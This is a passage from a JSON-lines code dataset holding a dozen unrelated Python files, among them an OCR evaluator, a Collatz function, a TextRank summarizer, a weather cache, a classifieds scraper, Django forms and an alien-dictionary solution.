[q_result['leftX'],q_result['topY'],q_result['leftX']+q_result['questionWidth'],q_result['topY']+q_result['questionHeight']]\n result = Result(bbox,img,'')\n result.output = label_replace(label)\n result.state = eval_label(result.output)\n json_result.connect_result.append(result)\n\n return json_result\n\n\n\n\n\ndef evaluate(save_path,log_path,xml_path, img_path,recog_path,recognition_xml):\n\n\n all_img = set_xml_data(xml_path, img_path,recog_path,recognition_xml)\n\n # sess1, sess2, net, run_list, dense_decoder, inputs, width, is_training, logits, sequence_length, decodes_greedy = create_sess()\n\n evaluate_data = Evaluate_Data()\n\n for i,true_result in enumerate(all_img):\n true_result.row_connect()\n img = true_result.img\n json = get_json_result(true_result.img_path)\n # pre_result, bboxes, types = pipeline(img.copy(), sess1, sess2, net, run_list, dense_decoder, inputs, width,\n # is_training, logits, sequence_length, decodes_greedy)\n bboxes = []\n types = []\n pre_result = 
json_to_result(json,img)\n single_img_evaluate = Single_Img_Evaluate(true_result,pre_result,img,true_result.name,save_path,'',bboxes, types)\n single_img_evaluate.get_pair()\n single_img_evaluate.statistic_data()\n single_img_evaluate.compute()\n single_img_evaluate.print_write_result(log_path)\n single_img_evaluate.draw_result()\n print('目前总共:')\n evaluate_data.add_data(single_img_evaluate)\n evaluate_data.compute()\n evaluate_data.print_result()\n print('------------------------------------------------------------------')\n\n evaluate_data.write_result(log_path)\n\n\nif __name__ == '__main__':\n save_path = '/home/wzh/第一批/val的验证' #保存的地址\n log_path = 'log.txt' #结果的log文件夹\n xml_path = '/home/wzh/第一批/img_val_xml' #验证集检测标注的文件夹\n img_path = '/home/wzh/第一批/img_val' #验证集的图片文件夹\n recog_path = '/home/wzh/第一批/suanshi_val' #验证集的识别标注文件夹\n recognition_xml = 'outputs' #验证集识别xml文件夹的名称\n\n\n\n\n # #第五批------------------------------------------------------------------------------------------------------\n # save_path = os.environ['HOME']+'/第五批-测试集/第五批测试集-检验'\n # log_path = os.environ['HOME']+'/第五批-测试集/第五批测试集-检验/log.txt'\n # xml_path = os.environ['HOME']+'/第五批-测试集/第五批测试集/生成的xml文件'\n # img_path = os.environ['HOME']+'/第五批-测试集/第五批测试集/原始图片'\n # recog_path = os.environ['HOME']+'/第五批-测试集/第五批测试集识别图-result'\n # recognition_xml = 'xml'\n\n\n evaluate(save_path,log_path,xml_path, img_path,recog_path,recognition_xml)","repo_name":"wwzzhh063/ocr","sub_path":"evaluate_data.py","file_name":"evaluate_data.py","file_ext":"py","file_size_in_byte":16186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11737356628","text":"#!/usr/bin/python3\n\n# =============================================================================\n# An implementation of the Syracuse algorithm in Python. Cleaned it up after\n# trying the same in Ruby, using this for reference. The old one wasn't as\n# smart in its operations, it used string concatenation and frequent conversion\n# to integers. For example, it did not previously use integer division!\n# =============================================================================\n\n\ndef syracuse(number, max_iter=100):\n number = int(number)\n max_iter = int(max_iter)\n sequence = []\n sequence.append(number)\n for i in range(0, max_iter + 1):\n if sequence[-1] == 1: # Could be: sequence[-1] in [4, 2, 1]\n print(\n \"\\n Sequence repeats!\\n\\n\"\n \"Number of iterations: %s\\n\"\n \"Sequence:\\n%s\"\n % (i, sequence)\n )\n return sequence\n if (sequence[i] % 2) == 1:\n sequence.append(3 * sequence[i] + 1)\n if (sequence[i] % 2) == 0:\n sequence.append(sequence[i] // 2)\n if i == max_iter - 1:\n print(\n \"\\n Reached max. 
iterations!\\n\\n\"\n \"Sequence:\\n%s\"\n % sequence\n )\n return sequence\n","repo_name":"glm729/code-examples","sub_path":"src/python/syracuse.py","file_name":"syracuse.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74246611412","text":"from src.pages.Python.HomePage import HomePage\r\n\r\ndef test_downloads_android(browser,config):\r\n #GIVEN: Linguoo homepage.\r\n #WHEN: User clicks \"Android\" button (at the headder)\r\n #THEN: Go to playstore, linguoo app.\r\n\r\n #WHEN: User clicks on \"Play Store\" button (at the downloads section)\r\n #THEN: Go to plastore, linguoo app.\r\n\r\n homepage=HomePage(browser,config)\r\n homepage.load()\r\n\r\n playstorepage=homepage.click_android_button()\r\n url=playstorepage.return_url()\r\n\r\n assert url==config[\"playstore-url\"]\r\n\r\n homepage.load()\r\n\r\n url=homepage.click_playstore_button()\r\n\r\n assert url==config[\"playstore-url\"]\r\n ","repo_name":"Yiulius13/Linguoo-Page-QA","sub_path":"src/tests/Python/test_downloads_android.py","file_name":"test_downloads_android.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2818796205","text":"def get_real_j_val(i, j):\n return 1 + i + j\n\ndef get_idx_j_val(i, real_j):\n return real_j - i - 1\n\ndef fulfill_terms(value):\n return (value > 0 and value <= 0.5)\n\ndef semantic_graph_modification(individual, graph_docs, corpus_pas):\n for node1, node2, data in graph_docs.edges(data=True):\n weight_features_node1 = ((individual[0] * corpus_pas[node1].fst_feature) + (individual[1] * corpus_pas[node1].position_feature) +\n (individual[2] * corpus_pas[node1].p2p_feature) + (individual[3] * corpus_pas[node1].tfidf_feature)\n + (individual[4] * corpus_pas[node1].length_feature) + (individual[5] * corpus_pas[node1].pnoun_feature) + (individual[6] * corpus_pas[node1].num_feature) + \n (individual[7] * corpus_pas[node1].noun_verb_feature) + (individual[8] * corpus_pas[node1].temporal_feature) + (individual[9] * corpus_pas[node2].location_feature))\n weight_features_node2 = ((individual[0] * corpus_pas[node2].fst_feature) + (individual[1] * corpus_pas[node2].position_feature) +\n (individual[2] * corpus_pas[node2].p2p_feature) + (individual[3] * corpus_pas[node2].tfidf_feature)\n + (individual[4] * corpus_pas[node2].length_feature) + (individual[5] * corpus_pas[node2].pnoun_feature) + (individual[6] * corpus_pas[node2].num_feature) + \n (individual[7] * corpus_pas[node2].noun_verb_feature) + (individual[8] * corpus_pas[node2].temporal_feature) + (individual[9] * corpus_pas[node2].location_feature))\n data['weight'] = data['initial_weight'] * ((0.5 * weight_features_node1) + (0.5 * weight_features_node2))\n\n # fill sum weight\n for node in graph_docs.nodes:\n graph_docs.node[node]['sum_weight'] = sum(graph_docs[node][link]['weight'] for link in graph_docs[node])\n\nclass GraphAlgorithm:\n def __init__(self, graph, threshold=0.0001, dp=0.85, init=1.0, max_iter=100):\n self.__graph = graph\n self.__threshold = threshold\n self.__dp = dp\n self.__iteration = 0\n self.__init = init\n self.__max_iter = max_iter\n \n def init_graph(self):\n for node in self.__graph.nodes:\n self.__graph.node[node][self.__iteration] = self.__init\n\n def run_algorithm(self):\n keep_iteration = True\n self.__iteration = 0\n self.init_graph()\n \n for _ in range(self.__max_iter):\n self.__iteration += 1\n # 
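TextRank-style update: each node's new score mixes a constant (1 - dp)\n            # term with dp times the weighted contribution of its neighbours, each\n            # normalised by that neighbour's total outgoing weight (sum_weight).\n            # 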
print(self.__iteration)\n all_below_threshold = True\n for node in self.__graph.nodes:\n dp_multiplier = 0.0\n for neighbor in self.__graph[node]:\n # neighbor's outgoing links\n if (self.__graph.node[neighbor]['sum_weight'] > 0):\n dp_multiplier += (self.__graph.node[neighbor][self.__iteration - 1] * self.__graph[node][neighbor]['weight'])/self.__graph.node[neighbor]['sum_weight']\n else:\n dp_multiplier += (self.__graph.node[neighbor][self.__iteration - 1] * self.__graph[node][neighbor]['weight'])\n self.__graph.node[node][self.__iteration] = (1 - self.__dp) + (self.__dp * dp_multiplier)\n # if (abs(self.__graph.node[node][self.__iteration] - self.__graph.node[node][self.__iteration - 1]) >= self.__threshold):\n # all_below_threshold = False\n\n err = sum(abs(self.__graph.node[node][self.__iteration] - self.__graph.node[node][self.__iteration - 1]) for node in self.__graph.nodes) \n if err < (len(self.__graph.nodes) * self.__threshold):\n break\n # keep_iteration = False\n # if (all_below_threshold):\n # keep_iteration = False\n\n def get_num_iter(self):\n return self.__iteration\n \n def get_trained_graph(self):\n return self.__graph\n","repo_name":"crahels/alphasummarizer","sub_path":"summarizer/modules/algorithms/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9668824778","text":"from typing import Any, List\nfrom dataclasses import dataclass\nimport os\nimport time\n\nimport requests\nimport xmltodict\n\n\n@dataclass\nclass Weather:\n temperature: float\n condition: str\n condition_icon: str # corresponds to an icon image file in static/images/\n forecasts: List[Any]\n\n @classmethod\n def parse(cls, xmldict) -> \"Weather\":\n temperature = float(\n xmldict[\"siteData\"][\"currentConditions\"][\"temperature\"][\"#text\"]\n )\n condition = xmldict[\"siteData\"][\"currentConditions\"][\"condition\"]\n condition_icon = xmldict[\"siteData\"][\"currentConditions\"][\"iconCode\"][\"#text\"]\n\n raw_forecasts = xmldict[\"siteData\"][\"forecastGroup\"][\"forecast\"][0:3]\n forecasts = [\n (\n x[\"abbreviatedForecast\"][\"textSummary\"],\n x[\"abbreviatedForecast\"][\"iconCode\"][\"#text\"],\n x[\"temperatures\"][\"textSummary\"],\n )\n for x in raw_forecasts\n ]\n\n return Weather(\n temperature=temperature,\n condition=condition,\n condition_icon=condition_icon,\n forecasts=forecasts,\n )\n\n\ndef fetch(force=False):\n cache = \"latest.xml\"\n\n if force or is_old(cache):\n print('fetching fresh...')\n response = requests.get(\n \"https://dd.weather.gc.ca/citypage_weather/xml/ON/s0000430_e.xml\"\n )\n response.raise_for_status()\n content = response.text\n with open(cache, \"w\", encoding=\"latin-1\") as file:\n file.write(content)\n else:\n print('using cache')\n with open(cache, \"r\", encoding=\"latin-1\") as file:\n content = file.read()\n\n\n return Weather.parse(xmltodict.parse(content))\n\ndef is_old(path) -> bool:\n fifteen_minutes = 60 * 15\n return (time.time() - os.path.getmtime(path)) > fifteen_minutes","repo_name":"tahnok/walter","sub_path":"server/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"30489233649","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport csv\nimport requests\nimport pandas as pd\nfrom time import sleep\nimport io\n\nheaders = {\n 'User-agent' : 'Mozilla/5.0 
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36',\n 'Accept-Language' : 'en-US, en;q=0.5'\n}\narama = input(\"Aramak istediğiniz şey nedir?:\")\nsearch_query = arama.replace(' ', '+')\nurl = 'https://www.sahibinden.com/kelime-ile-arama?query_text={0}'.format(search_query)\nresponse = requests.get(url, headers = headers, allow_redirects=False)\nmy_soup = BeautifulSoup(response.content, 'html.parser')\nresults = str(my_soup.find_all('title'))\n\nitems = []\ndef deneme(url):\n num_pages = 100\n for page in range(0, num_pages + 1):\n url_3 = f'https://www.sahibinden.com' + url + \"&pagingOffset={0}\".format(str(page * 20))\n print(url_3)\n response_2 = requests.get(url_3, headers=headers)\n print(response_2.status_code)\n if(response_2.status_code==429):\n print(\"fazla istek\")\n sleep(10)\n print(\"timeout\")\n continue\n my_soup_1 = BeautifulSoup(response_2.content, 'html.parser')\n\n listings = my_soup_1.find_all('tr', {'class': 'searchResultsItem'})\n denek2 = my_soup_1.find(\"tbody\",{\"class\":\"searchResultsRowClass\"})\n denek3 = denek2.find_all(\"tr\",{\"class\":\"searchResultsItem\"})\n def my_arr(data):\n return data.text\n for dene in denek3 :\n try:\n no = dene[\"data-id\"]\n price_elem = dene.find('td', {'class': 'searchResultsPriceValue'}).find(\"span\").text\n print(price_elem)\n product_elem = dene.find('a', {'class': 'classifiedTitle'}).text.strip()\n date_elem = dene.find('td', {'class': 'searchResultsDateValue'}).find_all(\"span\")\n arr_map = list(map(my_arr,date_elem))\n arr_join =(\" \").join(arr_map)\n location_elem = dene.find('td', {'class': 'searchResultsLocationValue'}).text.strip() # buraya bak\n row = {\n 'Price': price_elem,\n 'Product Name': product_elem,\n 'Date': arr_join,\n 'Location': location_elem,\n 'ID': no\n }\n items.append(row)\n print(row)\n\n df = pd.DataFrame(items, columns=['Price', 'Product Name', 'Date', 'Location', 'ID'])\n df.to_csv('{0}.csv'.format(search_query), index=False, encoding='utf-8-sig')\n\n except AttributeError:\n continue\n except KeyError:\n continue\n\nprint(response.status_code)\nif (response.status_code==200):\n\n\n my_soup1 = my_soup.find_all('div',class_= 'category-top-level')\n\n for category in my_soup1:\n name = category.a.text.strip()\n count = int(category.a.strong.span.text.strip().replace(',', ''))\n my_list = category.a['href'].split(\"&\")\n try:\n category_id = list(filter(lambda x: x.startswith('category='), my_list))[0].split('=')[1]\n print(name.replace(str(count),\"\").replace(\"ilan\",\" \"), count,\"...tane ilan var.\" , \"ID: \" , category_id)\n\n except IndexError:\n print(\"hata\")\n Id = input(\"Kategori ID seç:\")\n\n url_2 = 'https://www.sahibinden.com/kelime-ile-arama-yonlendir?disableEstimation=false&category={0}&query_text={1}'.format(str(Id),search_query)\n\n response_2 = requests.get(url_2, headers=headers, allow_redirects=False)\n redirect = response_2.headers['Location']\n print(redirect)\n my_soup_1 = BeautifulSoup(response_2.content, 'html.parser')\n\n listings = my_soup_1.find_all('tr', {'class': 'searchResultsItem'})\n\n deneme(redirect)\n\nelif(response.status_code==301):\n print(response)\n redirect = response.headers['Location']\n deneme(redirect)\n\nelse:\n print(\"hata\",response.status_code)\n\n\n\n#with io.open('{0}.csv'.format(search_query), mode='w', newline='', encoding='utf-8') as file:\n\n# writer = csv.DictWriter(file, fieldnames=['Price', 'Product Name', 'Date', 'Location', 'ID'])\n # writer.writeheader()\n # 
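kept for reference: a csv.DictWriter alternative to the pandas to_csv call\n    # inside deneme(); if re-enabled, prefer encoding='utf-8-sig' as used there,\n    # so the Turkish characters survive a round trip through Excel.\n    # 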
writer.writerows(items)\n\n\n\n","repo_name":"Tamayerd/WebScraping","sub_path":"sahibinden.py","file_name":"sahibinden.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12719077513","text":"from functools import partial\nfrom pathlib import Path\nfrom typing import Optional\nimport click\nfrom tsbench.analysis.utils import num_fitting_processes, run_parallel\nfrom tsbench.config import DATASET_REGISTRY\nfrom tsbench.constants import DEFAULT_DATA_PATH\nfrom ._main import datasets\n\n\n@datasets.command(short_help=\"Download and preprocess datasets.\")\n@click.option(\n \"--dataset\",\n type=str,\n default=None,\n help=(\n \"The dataset to compute basic statistics for. \"\n \"If not provided, computes statistics for all datasets.\"\n ),\n)\n@click.option(\n \"--path\",\n type=str,\n default=DEFAULT_DATA_PATH,\n show_default=True,\n help=\"The path where the datasets should be downloaded to.\",\n)\ndef download(dataset: Optional[str], path: str):\n \"\"\"\n Downloads and preprocesses either a single dataset or all datasets in the\n registry.\n \"\"\"\n base = Path(path)\n\n if dataset is not None:\n dataset_cls = DATASET_REGISTRY[dataset](base)\n dataset_cls.generate()\n dataset_cls.prepare()\n return\n\n # Start off by downloading an M3 dataset\n dataset_cls = DATASET_REGISTRY[\"m3_monthly\"](base)\n dataset_cls.generate()\n dataset_cls.prepare()\n\n # Then, we can download the rest in parallel (by preloading, we don't download the M3 data in\n # parallel)\n run_parallel(\n partial(_download_dataset, base=base),\n list(DATASET_REGISTRY.keys()),\n num_processes=min(\n num_fitting_processes(cpus_per_process=1, memory_per_process=8),\n len(DATASET_REGISTRY),\n ),\n )\n\n\ndef _download_dataset(name: str, base: Path):\n dataset_cls = DATASET_REGISTRY[name](base)\n dataset_cls.generate()\n dataset_cls.prepare()\n","repo_name":"awslabs/gluonts","sub_path":"src/gluonts/nursery/tsbench/src/cli/datasets/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":3904,"dataset":"github-code","pt":"67"} +{"seq_id":"74794894292","text":"from time import time\n\nimport numpy as np\nfrom AdaBoost import AdaBoost\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\n\n\n\n# Wczytanie danych\ndata = np.loadtxt('data.txt', delimiter=\",\")\ndat = data[:, 0:13]\n\nlearning = np.loadtxt('learning.txt', delimiter=\",\")\nlrn = learning[:, 8]\n\n# Podział i przygotowanie danych\ntrainingParameters, testingParameters, trainingOutcome, testingOutcome = train_test_split(dat, lrn, test_size=0.3)\n\ntrainingParameters = trainingParameters.transpose()\ntrainingOutcome[trainingOutcome == 1] = 1\ntrainingOutcome[trainingOutcome == 0] = -1\n\ntestingParameters = testingParameters.transpose()\ntestingOutcome[testingOutcome == 1] = 1\ntestingOutcome[testingOutcome == 0] = -1\n\n# Zastosowanie algorytmu\nadaBoost = AdaBoost(trainingParameters, trainingOutcome)\nstart = time()\nadaBoost.simulate(10)\nend = time()\ntimeElapsed = end - start\n\n# Estymacja\noutcomeEstimation = adaBoost.estimate(testingParameters)\n\nprint(f\"Czas dzialania algorytmu: {timeElapsed} s\")\nprint (\"Estymacja:\", len(outcomeEstimation[outcomeEstimation == testingOutcome]))\nprint (\"Precyzja:\", accuracy_score(testingOutcome, 
outcomeEstimation))\n\n","repo_name":"dam1508/PSZT-Projekt2","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15125188434","text":"import json\n\ndef printData(data):\n for d in data:\n print(\"_________________________________\")\n for key,value in d.items():\n print(\"{}\\t{}\".format(key,value))\n\nfileName = 'json/myJsonFile.json'\ndata = []\ntry:\n with open(fileName) as f:\n data = json.load(f)\nexcept:\n print(\"No specific file\")\nelse:\n print(\"All your json data:\")\n printData(data)\n\ndef saveData(data):\n with open(fileName, 'w') as json_file:\n json.dump(data, json_file)\n\nwhile True:\n inputData = input(\"What you want to do - Add data (+), quit program (q) or delete all data (-),show all data (*)\\n\")\n if(inputData == \"q\"):\n print(\"See you soon\")\n break\n if (inputData == \"-\"):\n data = []\n print(\"All data removed\")\n saveData(data)\n continue\n if (inputData == \"*\"):\n printData(data)\n saveData(data)\n continue\n if (inputData == \"+\"):\n print(\"Specyfy your car:\")\n brand = input(\"Brand \\n\")\n color = input(\"Color \\n\")\n price = input(\"Price \\n\")\n height = input(\"Height \\n\")\n newData = {\"Brand\":brand,\"Color\":color,\"Price\":price,\"Height\":height}\n data.append(newData)\n saveData(data)\n\n continue\n print(\"Wrong command\")\n\nsaveData(data)","repo_name":"Mopiel/Python-Linux","sub_path":"18_JSON.py","file_name":"18_JSON.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"712453501","text":"from django import forms\nfrom pruebas.models import Productos, Paises, Periodos\n\n\nclass FormProductos(forms.ModelForm):\n #nombre=forms.ModelChoiceField(queryset=Productos.objects.values_list('nombre', flat=True).distinct(), label='')\n nombre=forms.ModelChoiceField(queryset=None, label=\"\", empty_label='Seleccione un Plan', required=False)\n \n class Meta:\n model=Productos\n fields=['nombre']\n labels={'nombre':''}\n\n\n\n def __init__(self,*args,**kwars):\n super().__init__(*args,**kwars)\n for field in iter(self.fields):\n \n self.fields[field].widget.attrs.update({\n 'class':'js-example-basic-single',\n 'style':'width: 300px;'\n\n })\n self.fields['nombre'].queryset=Productos.objects.values_list('nombre', flat=True).distinct()\n\nclass FormPeriodos(forms.ModelForm):\n periodo=forms.ModelChoiceField(queryset=Periodos.objects.all(), label='', empty_label='Seleccione un periodo',required=False)\n \n \n class Meta:\n model=Periodos\n fields=['periodo']\n labels={'periodo':''}\n\n def __init__(self,*args,**kwars):\n super().__init__(*args,**kwars)\n for field in iter(self.fields):\n \n self.fields[field].widget.attrs.update({\n 'class':'js-example-basic-single',\n 'style':'width: 300px;'\n \n })\n\nclass FormPaises(forms.ModelForm):\n pais=forms.ModelChoiceField(queryset=Paises.objects.all(), label='', empty_label='Seleccione un pais',required=False)\n \n \n class Meta:\n model=Paises\n fields=['pais']\n labels={'pais':''}\n\n def __init__(self,*args,**kwars):\n super().__init__(*args,**kwars)\n for field in iter(self.fields):\n \n self.fields[field].widget.attrs.update({\n 'class':'js-example-basic-single',\n 'style':'width: 300px;'\n \n })\n\nclass FormCreate(forms.ModelForm):\n #Lista_periodos=[('0','Seleccione un 
periodo'),('Mensual','Mensual'),('Trimestral','Trimestral'),('Semestral','Semestral'),('Anual','Anual'),('Bianual','Bianual'),('5 años','5 años')]\n #Lista_paises=[('0','Seleccione un país'),('Argentina','Argentina'),('Venezuela','Venezuela'),('Chile','Chile'),('Uruguay','Uruguay'),('Peru','Peru')]\n #Lista_id=[('Mensual','1 - Mensual'),('Trimestral','2 - Trimestral'),('Semestral','3 - Semestral'),('Anual','4 - Anual'),('Bianual','5 - Bianual'),('5 años','6 - 5años')]\n \n #pais=forms.ChoiceField(choices=(Lista_paises), label='Residencia',initial='Seleccione un país')\n #periodo=forms.ChoiceField(choices=(Lista_periodos), label='Periodo de pago', initial='Seleccione un periodo')\n #id_periodo=forms.ChoiceField(choices=(Lista_id), label='ID Periodo de pago', initial='Seleccione ID correspondiente')\n \n \n #pais=forms.ModelChoiceField(queryset=Productos_Arg.objects.values_list('pais', flat=True).distinct('pais'), label='Residencia', to_field_name=\"pais\", empty_label='Seleccione un país')\n #id_periodo=forms.ModelChoiceField(queryset=Productos_Arg.objects.values_list('id_periodo', flat=True).distinct('id_periodo'), label='ID periodo de pago', to_field_name=\"id_periodo\", empty_label='Seleccione un ID')\n #periodo=forms.ModelChoiceField(queryset=Productos_Arg.objects.values_list('periodo', flat=True).order_by('id_periodo').distinct('id_periodo'), empty_label='Seleccione un periodo')\n #peroido=forms.TextInput(attrs={'readonly':'readonly'})\n \n periodo=forms.ModelChoiceField(queryset=Periodos.objects.all(), empty_label='Seleccione un periodo', label='')\n pais=forms.ModelChoiceField(queryset=Paises.objects.all(),empty_label='Seleccione un pais',label='')\n descripcion=forms.CharField(widget=forms.Textarea(attrs={'placeholder':'Escriba la descripcion del producto'}), label='')\n\n \n class Meta:\n model=Productos\n\n fields=['nombre','periodo','pais','descripcion','PrecioCompra','PrecioRenovacion']\n labels={\n 'nombre':'',\n 'PrecioCompra':'',\n 'PrecioRenovacion':'',\n 'descripcion':'',\n }\n\n\n def __init__(self,*args,**kwars):\n super().__init__(*args,**kwars)\n for field in iter(self.fields):\n \n self.fields[field].widget.attrs.update({\n 'class':'form-control',\n \n })\n self.fields['nombre'].widget.attrs.update({\n 'placeholder':'Escriba nombre del plan'})\n self.fields['PrecioCompra'].widget.attrs.update({\n 'placeholder':'Escriba precio de compra'})\n self.fields['PrecioRenovacion'].widget.attrs.update({\n 'placeholder':'Escriba precio de renovacion'})\n\n\n \n\n ","repo_name":"jmf-informatica/Proyecto-Django-2","sub_path":"mytestsite/pruebas/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4518437729","text":"import sqlite3\nimport os\n\n#open weather map client wrapper\nimport pyowm\nimport time\n\n#imports the variables from the config.py file\nfrom config import *\n\n#create the data directory if it doesn't exist\nif not os.path.exists('data'):\n os.makedirs('data')\n\n#create the db in the data directory\ndb = sqlite3.connect('data/weatherdb')\n\n# Get a cursor object and create the table\ncursor = db.cursor()\ncursor.execute('''\n CREATE TABLE IF NOT EXISTS users(time_stamp INTEGER,\n weather_code INTEGER)\n''')\ndb.commit()\n\n#defines the weather object\nowm = pyowm.OWM(API_KEY)\n\nwhile True:\n\n #pulls a time stamp\n now_stamp = int(time.time())\n #print(\"now_stamp = \" + str(now_stamp))\n\n #pulls the weather data\n observation = 
owm.weather_at_id(4033936)\n    w = observation.get_weather()\n    condition = int(w.get_weather_code())\n    #print(\"condition = \" + str(condition))\n\n    #writes the time stamp and weather data into the db\n    cursor.execute('''INSERT INTO users(time_stamp, weather_code)\n                  VALUES(?,?)''', (now_stamp,condition))\n    print(\"now_stamp = \" + str(now_stamp) + \" condition = \" + str(condition) + \" to db\")\n    db.commit()\n\n    #sets the database cutoff at everything more than 3 minutes old\n    db_cutoff = now_stamp - 180\n    print(\"db_cutoff = \" + str(db_cutoff))\n\n    #removes the old entries\n    #and yes that comma after db_cutoff is necessary\n    cursor.execute('''DELETE FROM users WHERE time_stamp < ? ''', (db_cutoff,))\n    db.commit()\n\n    time.sleep(10)\n","repo_name":"mwweinberg/weather_cloud","sub_path":"weatherdb.py","file_name":"weatherdb.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37665408515","text":"import datetime\n\nfrom sqlalchemy.schema import Column\nfrom sqlalchemy.types import Integer\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.types import Float\nBase = declarative_base()\n\nclass Muestras(Base):\n    __tablename__ = 'muestras'\n    id=Column(Integer, primary_key=True)\n    pasos=Column('pasos', Integer)\n    distancia=Column('distancia', Float)\n    calorias=Column('calorias', Float)\n    velocidad=Column('velocidad', Float)\n    \n    def __init__(self,pasos,distancia,calorias,velocidad):\n        self.pasos=pasos\n        self.distancia=distancia\n        self.calorias=calorias\n        self.velocidad=velocidad\n\n    ","repo_name":"jefferson556/podometro","sub_path":"www/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20421965211","text":"import json\n\n# Find the most successful manager by total sales amount.\n# As the answer, print his first name, then his last name, and then his total sales amount, separated by spaces.\n# File: manager_sales.json\n\nwith open('manager_sales.json', 'r') as json_file:\n    sales = json.load(json_file)\n\nmax_sales = 0\nbest_manager_name = ''\nbest_manager_surname = ''\n\nfor manager in sales:\n    manager_name = manager['manager']['first_name']\n    manager_surname = manager['manager']['last_name']\n    sum_of_sales = sum([car['price'] for car in manager['cars']])\n    if sum_of_sales > max_sales:\n        max_sales = sum_of_sales\n        best_manager_name = manager_name\n        best_manager_surname = manager_surname\n\nprint(f'{best_manager_name} {best_manager_surname} {max_sales}')","repo_name":"olenaruda/ithillel-python-qa","sub_path":"Lesson_9_100523/Homework_9/second_task.py","file_name":"second_task.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23231632483","text":"#Kajetan Mieloch, group 3, exercise 2 from list 6\r\n\r\ndef popaSeISeNapisz(n, poczWart = 1):\r\n\r\n    #Works only for single digits\r\n    if poczWart > 9:\r\n        return \"The initial value must be less than 10\"\r\n\r\n    #set the initial values\r\n    poczWart = str(poczWart)\r\n    if (n == 1):\r\n        return poczWart\r\n    if (n == 2):\r\n        return \"1\"+poczWart\r\n    podst = \"1\"+poczWart\r\n    #use the | character to separate consecutive numbers of the sequence\r\n    for i in range(3, n + 1):\r\n        podst += '|'\r\n        l = len(podst)\r\n        tempNumb = 1\r\n        tmp = \"\"\r\n        #check whether adjacent digits are identical\r\n        for j in range(1, l):\r\n            if (podst[j] != podst[j - 1]):\r\n                tmp += str(tempNumb)\r\n                tmp += podst[j - 1]\r\n                tempNumb = 1\r\n            else:\r\n                tempNumb += 1\r\n        podst = tmp\r\n    return podst\r\n\r\nn = 5\r\nprint(popaSeISeNapisz(n, 7))\r\n","repo_name":"KajetanMieloch/PythonExercises","sub_path":"Python List 6/zad3Lista6.py","file_name":"zad3Lista6.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"22996459370","text":"class Solution:\n    def alienOrder(self, words):\n        adj = {}\n        for word in words:\n            for c in word:\n                if c not in adj:\n                    adj[c] = set()\n\n        for i in range(len(words) - 1):\n            w1, w2 = words[i], words[i + 1]\n            minLen = min(len(w1), len(w2))\n            if len(w1) > len(w2) and w1[:minLen] == w2[:minLen]:\n                return \"\"\n            for j in range(minLen):\n                if w1[j] != w2[j]:\n                    adj[w1[j]].add(w2[j])\n                    break\n\n        visit = {} # False = visited , True = current path\n        res = []\n\n        def dfs(c):\n            if c in visit:\n                return visit[c]\n            visit[c] = True\n            for neighbor in adj[c]:\n                if dfs(neighbor):\n                    return True\n            visit[c] = False\n            res.append(c)\n\n        for c in adj:\n            if dfs(c):\n                return \"\"\n\n        res = res[::-1]\n        return \"\".join(res)\n\nX = Solution()\nprint(X.alienOrder([\"wrt\",\"wrf\",\"er\",\"ett\",\"rftt\"]))","repo_name":"anugrah18/Leetcode_solutions","sub_path":"Graphs/269-AlienDictionary.py","file_name":"269-AlienDictionary.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35879972272","text":"# =============================================================================\n# A class called Grid to define the partition of the 1-d space domain.\n# =============================================================================\n\nimport numpy as np\n\nclass Grid(object):\n    \"Stores all grid data and calculates dx and x locations.\"\n    \"The grid is assumed periodic. 
